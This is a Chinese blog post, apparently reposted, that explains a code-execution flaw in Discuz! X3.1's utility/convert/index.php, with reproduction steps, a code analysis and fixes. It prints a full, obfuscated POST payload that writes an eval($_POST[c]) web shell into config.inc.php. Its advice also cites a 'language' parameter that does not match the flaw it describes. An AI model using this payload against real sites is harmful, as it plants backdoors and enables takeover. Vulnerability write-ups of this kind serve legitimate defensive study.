漏洞
漏洞版本:Discuz! X3.1及以下版本。
漏洞描述:Discuz! X3.1的插件/utility/convert/index.php存在代码执行漏洞,如果用户在使用完之后不删除,会导致网站容易被入侵。
漏洞复现步骤
一、环境搭建
1、使用phpstudy搭建网站。
2、解开Discuz! X3.1的源码压缩包,进行安装。
3、选择全新安装,运行环境。
4、填写数据库及管理员信息,完成安装。
5、点击上方链接访问网站。
二、漏洞利用
1、访问网站。
2、抓取数据包,进行数据包重放。
3、发包后出现phpinfo信息,证明漏洞存在。
三、完整payload
a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
漏洞原理与分析
index.php文件分析:打开utility/convert/index.php的源码,可以看到该文件包含了common.inc.php文件,并定义了$action变量,该变量从POST请求中获取。
do_config.inc.php文件分析:当$action为"config"时,包含do_config.inc.php文件,该文件负责创建config.inc.php文件,并将POST的数据直接写入该文件中,无任何过滤检测。
payload详解:通过构造特定的POST请求,攻击者可以注入恶意PHP代码,这些代码将被写入config.inc.php文件中,并在下次访问时执行。
安全建议
删除/utility/convert目录:作为临时解决方案,可以删除该目录以防止漏洞被利用。
全面升级Discuz版本:升级到最新版本以修复已知的安全漏洞。
过滤language参数:在处理language参数时进行全面的安全过滤,限制特殊字符和恶意代码的执行。
限制脚本执行权限:对discuz目录的权限进行安全分配,限制data目录的脚本执行权限。
Discuz! X3.1的utility/convert/index.php文件存在严重的代码执行漏洞,攻击者可以通过构造特定的POST请求来注入并执行恶意PHP代码,为了保障网站安全,建议采取上述安全措施进行修复和加固。
小伙伴们,上文介绍by discuz x3.1漏洞的内容,你了解清楚吗?希望对你有所帮助,任何问题可以给我留言,让我们下期再见吧。
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/90569.html